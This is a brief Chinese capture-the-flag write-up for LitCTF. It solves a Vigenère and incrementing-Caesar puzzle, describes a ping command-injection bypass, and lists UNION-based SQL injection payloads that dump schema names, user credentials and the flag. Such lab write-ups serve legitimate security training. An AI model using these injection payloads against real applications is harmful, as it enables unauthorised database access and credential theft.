目录
(校外)Virginia
ping
这是什么?SQL !注一下 !
维吉尼亚,想到维吉尼亚解码但没有key就爆破key
Vigenere Solver | guballa.de
key=flag
发现解码出来的还有一部分是乱码,将部分乱码再次进行爆破
My password is not a regular Caesar password,and the enc flag=[86, 116, 128, 80, 98, 85, 139, 122, 134, 114, 125, 136, 117, 123, 129, 127, 128, 128, 142, 130, 140, 147, 127, 132, 131, 136, 151, 134, 152, 164] -Caesar
最终得知flag是不一样的凯撒,那只有变异凯撒
对照表格被次比赛是LitCTF
解码的第一个是86而L对应的是76,退了10
第二个是116而i对应的是105,退了11
第三是128而t对应的是116,退了12
由此可以看出每一个以为都递增的移动,所以可以写个小脚本解码出来
LitCTF{it_is_different_caesar}
查看源码,得知是输入ip
所以是ping注入,但无论如何注入都无法闭合
尝试抓包
抓包都会弹出,导致无法抓取
说明这个判断单是在前端的,先按规则输入ip就可以正常抓取
于是发往重发器进行ping注入
返回上一个目录,直至发现flag
直接分析下面的语句得知要闭合语句则要加6个括号
发现闭合成功,之后加上一系列的语句
1))))))union select 1,group_concat(table_name) from information_schema.tables where table_schema=database()#
1))))))union select 1,group_concat(column_name) from information_schema.columns where table_name="users"#
1))))))union select 1,group_concat(id,username,password) from users#
得到的只是部分彩蛋flag并非本题flag
只时使用另一语句查找
1))))))union select 1,schema_name from information_schema.schemata #
1))))))union select 1,table_name from information_schema.tables where table_schema='ctftraining'#
1))))))union select 1,flag from ctftraining.flag#